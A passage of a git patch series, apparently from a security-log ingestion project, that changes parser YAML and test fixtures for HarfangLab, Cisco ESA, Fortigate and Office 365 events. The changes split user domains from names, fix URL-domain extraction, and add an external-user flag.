"name": "administrateur" } } } diff --git a/HarfangLab/harfanglab/tests/dns.json b/HarfangLab/harfanglab/tests/dns.json index acf1cc407..903c7d68d 100644 --- a/HarfangLab/harfanglab/tests/dns.json +++ b/HarfangLab/harfanglab/tests/dns.json @@ -57,11 +57,12 @@ "work-laptop" ], "user": [ - "test-domain\\john.doe" + "john.doe" ] }, "user": { - "name": "test-domain\\john.doe", + "domain": "test-domain", + "name": "john.doe", "roles": "custom-group" } } diff --git a/HarfangLab/harfanglab/tests/network.json b/HarfangLab/harfanglab/tests/network.json index 0a8eef023..e047efaf0 100644 --- a/HarfangLab/harfanglab/tests/network.json +++ b/HarfangLab/harfanglab/tests/network.json @@ -50,7 +50,7 @@ "192.168.120.41" ], "user": [ - "NT AUTHORITY\\SYSTEM" + "SYSTEM" ] }, "source": { @@ -59,7 +59,8 @@ "port": 21955 }, "user": { - "name": "NT AUTHORITY\\SYSTEM" + "domain": "NT AUTHORITY", + "name": "SYSTEM" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/network2.json b/HarfangLab/harfanglab/tests/network2.json index 43ba71477..b350a10ac 100644 --- a/HarfangLab/harfanglab/tests/network2.json +++ b/HarfangLab/harfanglab/tests/network2.json @@ -51,7 +51,7 @@ "185.202.2.238" ], "user": [ - "NT AUTHORITY\\NETWORK SERVICE" + "NETWORK SERVICE" ] }, "source": { @@ -60,7 +60,8 @@ "port": 42221 }, "user": { - "name": "NT AUTHORITY\\NETWORK SERVICE" + "domain": "NT AUTHORITY", + "name": "NETWORK SERVICE" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/process-event.json b/HarfangLab/harfanglab/tests/process-event.json index abbbd338b..9f1f078f3 100644 --- a/HarfangLab/harfanglab/tests/process-event.json +++ b/HarfangLab/harfanglab/tests/process-event.json @@ -81,11 +81,12 @@ "SFRTAOA" ], "user": [ - "NT AUTHORITY\\SYSTEM" + "SYSTEM" ] }, "user": { - "name": "NT AUTHORITY\\SYSTEM", + "domain": "NT AUTHORITY", + "name": "SYSTEM", "roles": "Group1" } } diff --git a/HarfangLab/harfanglab/tests/process.json b/HarfangLab/harfanglab/tests/process.json index c91f0a2c0..024f674a3 100644 --- a/HarfangLab/harfanglab/tests/process.json +++ b/HarfangLab/harfanglab/tests/process.json @@ -74,11 +74,12 @@ "EXCHANGE" ], "user": [ - "NT AUTHORITY\\SYSTEM" + "SYSTEM" ] }, "user": { - "name": "NT AUTHORITY\\SYSTEM" + "domain": "NT AUTHORITY", + "name": "SYSTEM" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/process2.json b/HarfangLab/harfanglab/tests/process2.json index f01c2921f..99b1994fb 100644 --- a/HarfangLab/harfanglab/tests/process2.json +++ b/HarfangLab/harfanglab/tests/process2.json @@ -76,7 +76,7 @@ "pc123" ], "user": [ - "XXX\\XXX" + "XXX" ] }, "rule": { @@ -86,7 +86,8 @@ "name": "Discovery: Process list" }, "user": { - "name": "XXX\\XXX" + "domain": "XXX", + "name": "XXX" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/process3.json b/HarfangLab/harfanglab/tests/process3.json index 035f70d0f..3e464ccab 100644 --- a/HarfangLab/harfanglab/tests/process3.json +++ b/HarfangLab/harfanglab/tests/process3.json @@ -74,11 +74,12 @@ "REDACTED" ], "user": [ - "NT AUTHORITY\\NETWORK SERVICE" + "NETWORK SERVICE" ] }, "user": { - "name": "NT AUTHORITY\\NETWORK SERVICE" + "domain": "NT AUTHORITY", + "name": "NETWORK SERVICE" } } } \ No newline at end of file diff --git a/HarfangLab/harfanglab/tests/process4.json b/HarfangLab/harfanglab/tests/process4.json index a19bf13fc..3f32333c2 100644 --- a/HarfangLab/harfanglab/tests/process4.json +++ b/HarfangLab/harfanglab/tests/process4.json @@ -87,11 +87,12 @@ "jdoe" ], "user": [ - "TST USER\\SYSTEM" + "SYSTEM" ] }, "user": { - "name": "TST USER\\SYSTEM", + "domain": "TST USER", + "name": "SYSTEM", "roles": "test_group" } } From bc460dc02fadba94aa2dceb3e0b86ee58eca8967 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Wed, 11 Dec 2024 11:38:21 +0100 Subject: [PATCH 142/150] Fix for url with no http header --- Cisco/cisco-esa/ingest/parser.yml | 2 +- Cisco/cisco-esa/tests/test_ingest_log5.json | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Cisco/cisco-esa/ingest/parser.yml b/Cisco/cisco-esa/ingest/parser.yml index ea082905c..06a4f7dec 100644 --- a/Cisco/cisco-esa/ingest/parser.yml +++ b/Cisco/cisco-esa/ingest/parser.yml @@ -211,7 +211,7 @@ stages: {%- endfor %}] cisco.esa.url_domain: >- [{% for url, details in json_event_url_details.message.items() %} - {% if details.get('ExpandedUrl') is not none %}"{{url.split('/')[2]}}", "{{ details.ExpandedUrl.split('/')[2] }}"{% else %}"{{ url.split('/')[2] }}"{% endif %} + {% if details.get('ExpandedUrl') is not none %}"{{url.replace('https://','').replace('http://','').split('/')[0]}}", "{{ details.ExpandedUrl.replace('https://','').replace('http://','').split('/')[0] }}"{% else %}"{{ url.replace('https://','').replace('http://','').split('/')[0] }}"{% endif %} {% if not loop.last %},{% endif %} {% endfor %}] cisco.esa.url: >- diff --git a/Cisco/cisco-esa/tests/test_ingest_log5.json b/Cisco/cisco-esa/tests/test_ingest_log5.json index 6bc9470fd..46ca9ebb4 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log5.json +++ b/Cisco/cisco-esa/tests/test_ingest_log5.json @@ -59,10 +59,10 @@ "www.twitter.com" ], "url_domain": [ - "", "facebook.com", "tiktok.com", - "tinyurl.es" + "tinyurl.es", + "www.twitter.com" ] } }, From 0c17da55c79c3cb0498e27bd152797f8f647ec0e Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Wed, 11 Dec 2024 13:52:16 +0100 Subject: [PATCH 143/150] fix to avoid empty lists --- Cisco/cisco-esa/ingest/parser.yml | 23 ++++++++++++--------- Cisco/cisco-esa/tests/test_ingest_log7.json | 4 +--- 2 files changed, 14 insertions(+), 13 deletions(-) diff --git a/Cisco/cisco-esa/ingest/parser.yml b/Cisco/cisco-esa/ingest/parser.yml index 06a4f7dec..8f3acbeb3 100644 --- a/Cisco/cisco-esa/ingest/parser.yml +++ b/Cisco/cisco-esa/ingest/parser.yml @@ -209,16 +209,6 @@ stages: {% endif %} {% endif %} {%- endfor %}] - cisco.esa.url_domain: >- - [{% for url, details in json_event_url_details.message.items() %} - {% if details.get('ExpandedUrl') is not none %}"{{url.replace('https://','').replace('http://','').split('/')[0]}}", "{{ details.ExpandedUrl.replace('https://','').replace('http://','').split('/')[0] }}"{% else %}"{{ url.replace('https://','').replace('http://','').split('/')[0] }}"{% endif %} - {% if not loop.last %},{% endif %} - {% endfor %}] - cisco.esa.url: >- - [{% for url, details in json_event_url_details.message.items() %} - {% if details.get('ExpandedUrl') is not none %}"{{url}}", "{{ details.ExpandedUrl }}"{% else %}"{{ url }}"{% endif %} - {% if not loop.last %},{% endif %} - {% endfor %}] url.domain: "{{parsed_event.message.EAURLDetails}}" cisco.esa.delivery.connection_id: "{{parsed_event.message.ESADCID}}" cisco.esa.injection.connection_id: "{{parsed_event.message.ESAICID}}" @@ -237,6 +227,19 @@ stages: cisco.esa.helo.ip: "{{parsed_event.message.ESAHeloIP}}" filter: "{{parsed_event.message.ESAHeloIP | is_ipaddress}}" + - set: + cisco.esa.url_domain: >- + [{% for url, details in json_event_url_details.message.items() %} + {% if details.get('ExpandedUrl') is not none %}"{{url.replace('https://','').replace('http://','').split('/')[0]}}", "{{ details.ExpandedUrl.replace('https://','').replace('http://','').split('/')[0] }}"{% else %}"{{ url.replace('https://','').replace('http://','').split('/')[0] }}"{% endif %} + {% if not loop.last %},{% endif %} + {% endfor %}] + cisco.esa.url: >- + [{% for url, details in json_event_url_details.message.items() %} + {% if details.get('ExpandedUrl') is not none %}"{{url}}", "{{ details.ExpandedUrl }}"{% else %}"{{ url }}"{% endif %} + {% if not loop.last %},{% endif %} + {% endfor %}] + filter: "{{json_event_url_details.message | length > 0}}" + - set: cisco.esa.helo.domain: "{{parsed_event.message.ESAHeloDomain}}" cisco.esa.sender_group: "{{parsed_event.message.ESASenderGroup}}" diff --git a/Cisco/cisco-esa/tests/test_ingest_log7.json b/Cisco/cisco-esa/tests/test_ingest_log7.json index 45d8465a7..b77951dcf 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log7.json +++ b/Cisco/cisco-esa/tests/test_ingest_log7.json @@ -54,9 +54,7 @@ "domain": { "age": "30 days (or greater)" } - }, - "url": [], - "url_domain": [] + } } }, "email": { From 41472aad15b100b1777f2793d1e0fea503bc93e2 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 11 Dec 2024 14:38:07 +0100 Subject: [PATCH 144/150] fix(Fortigate): reorder the fields for destination.domain --- Fortinet/fortigate/ingest/parser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Fortinet/fortigate/ingest/parser.yml b/Fortinet/fortigate/ingest/parser.yml index 4cda504c7..cbb9b311a 100644 --- a/Fortinet/fortigate/ingest/parser.yml +++ b/Fortinet/fortigate/ingest/parser.yml @@ -191,7 +191,7 @@ stages: event.action: "{{parsed_event.message.name or parsed_event.message.FTNTFGTaction or parsed_event.message.FortinetFortiGateaction or parsed_event.message.act or parsed_event.message.action or parsed_event.message.reason}}" destination.address: "{{parsed_event.message.dstip or parsed_event.message.dst}}" destination.bytes: "{{parsed_event.message.rcvdbyte or parsed_event.message.in}}" - destination.domain: "{{parsed_event.message.remotename or parsed_event.message.hostname or parsed_event.message.dhost}}" + destination.domain: "{{parsed_event.message.remotename or parsed_event.message.dhost or parsed_event.message.hostname}}" destination.mac: "{{parsed_event.message.dstmac}}" destination.nat.port: "{{parsed_event.message.destinationTranslatedPort}}" destination.packets: "{{parsed_event.message.rcvdpkt or parsed_event.message.FTNTFGTrcvpkt or parsed_event.message.FortinetFortiGatercvdpkt or parsed_event.message.get('Packets Received')}}" From 2fd4878c938a1abfd534d47aaea1b057c3f8f60a Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 11 Dec 2024 16:54:29 +0200 Subject: [PATCH 145/150] O365 - parse email for external users --- Office 365/o365/_meta/fields.yml | 5 +++++ Office 365/o365/ingest/parser.yml | 7 +++++-- Office 365/o365/tests/ad.json | 1 + Office 365/o365/tests/ad_1.json | 1 + Office 365/o365/tests/add_member_to_role.json | 1 + .../o365/tests/automated_investigation_and_response.json | 1 + .../o365/tests/automated_investigation_and_response_1.json | 1 + ..._investigation_and_response_with_additional_fields.json | 1 + ...nvestigation_and_response_with_additional_fields_1.json | 1 + ...tomated_investigation_and_response_with_attachment.json | 1 + Office 365/o365/tests/browser_log.json | 1 + Office 365/o365/tests/clientipadress.json | 1 + Office 365/o365/tests/compliancemanager-scorechange.json | 1 + Office 365/o365/tests/email_reported.json | 1 + Office 365/o365/tests/exchange_event1.json | 1 + Office 365/o365/tests/exchange_item_aggregated.json | 1 + Office 365/o365/tests/exchange_item_group.json | 1 + Office 365/o365/tests/exchange_item_group_2.json | 1 + Office 365/o365/tests/exchange_item_update.json | 1 + Office 365/o365/tests/file_previewed.json | 1 + Office 365/o365/tests/file_size.json | 1 + Office 365/o365/tests/file_sync_download_full.json | 1 + Office 365/o365/tests/file_visited.json | 1 + Office 365/o365/tests/form_log.json | 1 + Office 365/o365/tests/inbox_rule.json | 1 + Office 365/o365/tests/managed_sync.json | 1 + Office 365/o365/tests/mass_download.json | 1 + Office 365/o365/tests/mcas_alert.json | 1 + .../tests/microsoft_defender_threatintelligence_atp.json | 1 + .../tests/microsoft_defender_threatintelligence_mail.json | 1 + .../microsoft_defender_threatintelligence_url_click.json | 1 + Office 365/o365/tests/operation_properties_01.json | 1 + Office 365/o365/tests/operation_properties_02.json | 1 + Office 365/o365/tests/power_bi.json | 1 + Office 365/o365/tests/remove_member_from_role.json | 1 + Office 365/o365/tests/security_compliance_alert.json | 1 + Office 365/o365/tests/security_compliance_alert_2.json | 1 + Office 365/o365/tests/security_compliance_alert_3.json | 1 + Office 365/o365/tests/security_compliance_alert_4.json | 1 + Office 365/o365/tests/security_compliance_alert_5.json | 1 + Office 365/o365/tests/security_compliance_alert_7.json | 1 + .../tests/security_compliance_alert_malicious_url.json | 1 + Office 365/o365/tests/source_log.json | 1 + Office 365/o365/tests/targetusername.json | 1 + Office 365/o365/tests/teams_message_has_link.json | 1 + Office 365/o365/tests/teams_with_foreign_tenant_users.json | 1 + .../o365/tests/teams_with_foreign_tenant_users_2.json | 1 + .../o365/tests/teams_with_foreign_tenant_users_3.json | 1 + .../o365/tests/teams_without_foreign_tenant_users.json | 1 + Office 365/o365/tests/threat_intel.json | 1 + Office 365/o365/tests/update_group.json | 1 + Office 365/o365/tests/update_user.json | 1 + Office 365/o365/tests/update_user_empty_source_ip.json | 1 + Office 365/o365/tests/user_logged_in.json | 1 + Office 365/o365/tests/user_logged_in_2.json | 1 + Office 365/o365/tests/user_login_failed.json | 1 + 56 files changed, 64 insertions(+), 2 deletions(-) diff --git a/Office 365/o365/_meta/fields.yml b/Office 365/o365/_meta/fields.yml index 02c13a28b..dfa4178de 100644 --- a/Office 365/o365/_meta/fields.yml +++ b/Office 365/o365/_meta/fields.yml @@ -513,6 +513,11 @@ office365.user_type.code: name: office365.user_type.code type: long +office365.user_type.is_external: + description: Whether user is external + name: office365.user_type.is_external + type: boolean + office365.user_type.name: description: The translated type of the user that performed the operation name: office365.user_type.name diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml index f0e861645..8568883db 100644 --- a/Office 365/o365/ingest/parser.yml +++ b/Office 365/o365/ingest/parser.yml @@ -77,7 +77,7 @@ stages: event.action: "{{json_event.message.Operation}}" event.code: "{{json_event.message.RecordType | string}}" event.reason: "{{json_event.message.ActionName}}" - user.name: "{{json_event.message.UserId}}" + user.name: "{{json_event.message.UserId.removeprefix('urn:spo:guest#')}}" user.id: "{{json_event.message.UserKey}}" organization.id: "{{json_event.message.OrganizationId}}" action.id: "{{json_event.message.RecordType}}" @@ -89,9 +89,12 @@ stages: filter: "{{parse_client_ip.result.ip | is_ipaddress}}" - set: - user.email: "{{json_event.message.UserId}}" + user.email: "{{json_event.message.UserId.removeprefix('urn:spo:guest#')}}" filter: '{{"@" in json_event.message.UserId}}' + - set: + office365.user_type.is_external: "{{'urn:spo:guest#' in json_event.message.UserId}}" + - set: source.ip: "{{parse_client_ip_address.result.ip}}" source.port: "{{parse_client_ip_address.result.port}}" diff --git a/Office 365/o365/tests/ad.json b/Office 365/o365/tests/ad.json index 4cfb5c636..359da7dbc 100644 --- a/Office 365/o365/tests/ad.json +++ b/Office 365/o365/tests/ad.json @@ -44,6 +44,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/ad_1.json b/Office 365/o365/tests/ad_1.json index 2474aeae8..aa501f91a 100644 --- a/Office 365/o365/tests/ad_1.json +++ b/Office 365/o365/tests/ad_1.json @@ -53,6 +53,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/add_member_to_role.json b/Office 365/o365/tests/add_member_to_role.json index 2ea3b7995..15b06db18 100644 --- a/Office 365/o365/tests/add_member_to_role.json +++ b/Office 365/o365/tests/add_member_to_role.json @@ -57,6 +57,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/automated_investigation_and_response.json b/Office 365/o365/tests/automated_investigation_and_response.json index bb5f028e8..3ae14890a 100644 --- a/Office 365/o365/tests/automated_investigation_and_response.json +++ b/Office 365/o365/tests/automated_investigation_and_response.json @@ -50,6 +50,7 @@ "record_type": 64, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/automated_investigation_and_response_1.json b/Office 365/o365/tests/automated_investigation_and_response_1.json index fb46179f0..b79920afb 100644 --- a/Office 365/o365/tests/automated_investigation_and_response_1.json +++ b/Office 365/o365/tests/automated_investigation_and_response_1.json @@ -145,6 +145,7 @@ "record_type": 64, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json index 6e6d8fd0f..e40af7314 100644 --- a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json +++ b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields.json @@ -95,6 +95,7 @@ "record_type": 64, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json index a3a57df24..ca940465a 100644 --- a/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json +++ b/Office 365/o365/tests/automated_investigation_and_response_with_additional_fields_1.json @@ -121,6 +121,7 @@ "record_type": 64, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json b/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json index 61b656511..173b1ef9c 100644 --- a/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json +++ b/Office 365/o365/tests/automated_investigation_and_response_with_attachment.json @@ -108,6 +108,7 @@ "record_type": 64, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/browser_log.json b/Office 365/o365/tests/browser_log.json index 611865bee..5bd149008 100644 --- a/Office 365/o365/tests/browser_log.json +++ b/Office 365/o365/tests/browser_log.json @@ -29,6 +29,7 @@ "record_type": 36, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/clientipadress.json b/Office 365/o365/tests/clientipadress.json index cc64b69af..661fe2bb6 100644 --- a/Office 365/o365/tests/clientipadress.json +++ b/Office 365/o365/tests/clientipadress.json @@ -38,6 +38,7 @@ "result_status": "Succeeded", "user_type": { "code": 5, + "is_external": false, "name": "Application" } }, diff --git a/Office 365/o365/tests/compliancemanager-scorechange.json b/Office 365/o365/tests/compliancemanager-scorechange.json index 9e31750bf..cc75e8e2c 100644 --- a/Office 365/o365/tests/compliancemanager-scorechange.json +++ b/Office 365/o365/tests/compliancemanager-scorechange.json @@ -22,6 +22,7 @@ "result_status": "Successful", "user_type": { "code": 2, + "is_external": false, "name": "Admin" } }, diff --git a/Office 365/o365/tests/email_reported.json b/Office 365/o365/tests/email_reported.json index e9b064f62..69696b1c5 100644 --- a/Office 365/o365/tests/email_reported.json +++ b/Office 365/o365/tests/email_reported.json @@ -39,6 +39,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/exchange_event1.json b/Office 365/o365/tests/exchange_event1.json index 881c1f21b..334ec01a8 100644 --- a/Office 365/o365/tests/exchange_event1.json +++ b/Office 365/o365/tests/exchange_event1.json @@ -39,6 +39,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/exchange_item_aggregated.json b/Office 365/o365/tests/exchange_item_aggregated.json index c15d8da5b..dc81df845 100644 --- a/Office 365/o365/tests/exchange_item_aggregated.json +++ b/Office 365/o365/tests/exchange_item_aggregated.json @@ -30,6 +30,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/exchange_item_group.json b/Office 365/o365/tests/exchange_item_group.json index 75fe23b37..2a7d13867 100644 --- a/Office 365/o365/tests/exchange_item_group.json +++ b/Office 365/o365/tests/exchange_item_group.json @@ -40,6 +40,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/exchange_item_group_2.json b/Office 365/o365/tests/exchange_item_group_2.json index 1af2cd661..cfbc956e6 100644 --- a/Office 365/o365/tests/exchange_item_group_2.json +++ b/Office 365/o365/tests/exchange_item_group_2.json @@ -93,6 +93,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/exchange_item_update.json b/Office 365/o365/tests/exchange_item_update.json index 30682248f..608d46063 100644 --- a/Office 365/o365/tests/exchange_item_update.json +++ b/Office 365/o365/tests/exchange_item_update.json @@ -41,6 +41,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/file_previewed.json b/Office 365/o365/tests/file_previewed.json index f5cd4e410..d3ce72283 100644 --- a/Office 365/o365/tests/file_previewed.json +++ b/Office 365/o365/tests/file_previewed.json @@ -42,6 +42,7 @@ "record_type": 6, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/file_size.json b/Office 365/o365/tests/file_size.json index ea0339b0b..7c6c0446f 100644 --- a/Office 365/o365/tests/file_size.json +++ b/Office 365/o365/tests/file_size.json @@ -52,6 +52,7 @@ "record_type": 6, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/file_sync_download_full.json b/Office 365/o365/tests/file_sync_download_full.json index 44dd5f6c3..159b72879 100644 --- a/Office 365/o365/tests/file_sync_download_full.json +++ b/Office 365/o365/tests/file_sync_download_full.json @@ -48,6 +48,7 @@ "record_type": 6, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/file_visited.json b/Office 365/o365/tests/file_visited.json index 46855c741..44ee7180b 100644 --- a/Office 365/o365/tests/file_visited.json +++ b/Office 365/o365/tests/file_visited.json @@ -30,6 +30,7 @@ "result_status": "TRUE", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/form_log.json b/Office 365/o365/tests/form_log.json index 7fc38b1d5..affdbd3b0 100644 --- a/Office 365/o365/tests/form_log.json +++ b/Office 365/o365/tests/form_log.json @@ -28,6 +28,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/inbox_rule.json b/Office 365/o365/tests/inbox_rule.json index f3609c050..1c31e54e6 100644 --- a/Office 365/o365/tests/inbox_rule.json +++ b/Office 365/o365/tests/inbox_rule.json @@ -46,6 +46,7 @@ "result_status": "True", "user_type": { "code": 2, + "is_external": false, "name": "Admin" } }, diff --git a/Office 365/o365/tests/managed_sync.json b/Office 365/o365/tests/managed_sync.json index 4c860c040..9157cdb0a 100644 --- a/Office 365/o365/tests/managed_sync.json +++ b/Office 365/o365/tests/managed_sync.json @@ -38,6 +38,7 @@ "record_type": 4, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/mass_download.json b/Office 365/o365/tests/mass_download.json index c072a45c4..d099f991b 100644 --- a/Office 365/o365/tests/mass_download.json +++ b/Office 365/o365/tests/mass_download.json @@ -39,6 +39,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/mcas_alert.json b/Office 365/o365/tests/mcas_alert.json index 91e13123f..0e7bbd829 100644 --- a/Office 365/o365/tests/mcas_alert.json +++ b/Office 365/o365/tests/mcas_alert.json @@ -41,6 +41,7 @@ "result_status": "New", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/microsoft_defender_threatintelligence_atp.json b/Office 365/o365/tests/microsoft_defender_threatintelligence_atp.json index e1397f623..cf341ed7d 100644 --- a/Office 365/o365/tests/microsoft_defender_threatintelligence_atp.json +++ b/Office 365/o365/tests/microsoft_defender_threatintelligence_atp.json @@ -33,6 +33,7 @@ "record_type": 47, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/microsoft_defender_threatintelligence_mail.json b/Office 365/o365/tests/microsoft_defender_threatintelligence_mail.json index 31948758b..ef016aff1 100644 --- a/Office 365/o365/tests/microsoft_defender_threatintelligence_mail.json +++ b/Office 365/o365/tests/microsoft_defender_threatintelligence_mail.json @@ -114,6 +114,7 @@ "record_type": 28, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json b/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json index 59fdd35ce..fd5c01c5f 100644 --- a/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json +++ b/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json @@ -21,6 +21,7 @@ "record_type": 41, "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/operation_properties_01.json b/Office 365/o365/tests/operation_properties_01.json index 790c6b45f..27d256630 100644 --- a/Office 365/o365/tests/operation_properties_01.json +++ b/Office 365/o365/tests/operation_properties_01.json @@ -61,6 +61,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/operation_properties_02.json b/Office 365/o365/tests/operation_properties_02.json index 3c91bcb5d..6d50c87eb 100644 --- a/Office 365/o365/tests/operation_properties_02.json +++ b/Office 365/o365/tests/operation_properties_02.json @@ -58,6 +58,7 @@ "result_status": "Succeeded", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/power_bi.json b/Office 365/o365/tests/power_bi.json index 04a388971..186958235 100644 --- a/Office 365/o365/tests/power_bi.json +++ b/Office 365/o365/tests/power_bi.json @@ -23,6 +23,7 @@ "record_type": 20, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/remove_member_from_role.json b/Office 365/o365/tests/remove_member_from_role.json index 5feefc067..cd39a1c92 100644 --- a/Office 365/o365/tests/remove_member_from_role.json +++ b/Office 365/o365/tests/remove_member_from_role.json @@ -57,6 +57,7 @@ "result_status": "Success", "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/security_compliance_alert.json b/Office 365/o365/tests/security_compliance_alert.json index 9988fb1fe..f3d73bb7d 100644 --- a/Office 365/o365/tests/security_compliance_alert.json +++ b/Office 365/o365/tests/security_compliance_alert.json @@ -39,6 +39,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_2.json b/Office 365/o365/tests/security_compliance_alert_2.json index 43cac929e..b52c6c789 100644 --- a/Office 365/o365/tests/security_compliance_alert_2.json +++ b/Office 365/o365/tests/security_compliance_alert_2.json @@ -65,6 +65,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_3.json b/Office 365/o365/tests/security_compliance_alert_3.json index 4a695584b..693cae46a 100644 --- a/Office 365/o365/tests/security_compliance_alert_3.json +++ b/Office 365/o365/tests/security_compliance_alert_3.json @@ -60,6 +60,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_4.json b/Office 365/o365/tests/security_compliance_alert_4.json index a6b83cc30..33fb22e5d 100644 --- a/Office 365/o365/tests/security_compliance_alert_4.json +++ b/Office 365/o365/tests/security_compliance_alert_4.json @@ -59,6 +59,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_5.json b/Office 365/o365/tests/security_compliance_alert_5.json index f0e153b7e..517d9efea 100644 --- a/Office 365/o365/tests/security_compliance_alert_5.json +++ b/Office 365/o365/tests/security_compliance_alert_5.json @@ -39,6 +39,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_7.json b/Office 365/o365/tests/security_compliance_alert_7.json index 0775bbdc8..062affbb5 100644 --- a/Office 365/o365/tests/security_compliance_alert_7.json +++ b/Office 365/o365/tests/security_compliance_alert_7.json @@ -60,6 +60,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/security_compliance_alert_malicious_url.json b/Office 365/o365/tests/security_compliance_alert_malicious_url.json index 7bb99fa1d..43e51bb06 100644 --- a/Office 365/o365/tests/security_compliance_alert_malicious_url.json +++ b/Office 365/o365/tests/security_compliance_alert_malicious_url.json @@ -53,6 +53,7 @@ "result_status": "Succeeded", "user_type": { "code": 4, + "is_external": false, "name": "System" } }, diff --git a/Office 365/o365/tests/source_log.json b/Office 365/o365/tests/source_log.json index 95ecbad6c..488df5065 100644 --- a/Office 365/o365/tests/source_log.json +++ b/Office 365/o365/tests/source_log.json @@ -48,6 +48,7 @@ "record_type": 14, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/targetusername.json b/Office 365/o365/tests/targetusername.json index ec3137b79..f881d49d9 100644 --- a/Office 365/o365/tests/targetusername.json +++ b/Office 365/o365/tests/targetusername.json @@ -58,6 +58,7 @@ "record_type": 14, "user_type": { "code": 0, + "is_external": false, "name": "Regular" } }, diff --git a/Office 365/o365/tests/teams_message_has_link.json b/Office 365/o365/tests/teams_message_has_link.json index cbb5caa76..03b584a02 100644 --- a/Office 365/o365/tests/teams_message_has_link.json +++ b/Office 365/o365/tests/teams_message_has_link.json @@ -50,6 +50,7 @@ }, "user_type": { "code": 0, + "is_external": false, "name": "Regular" 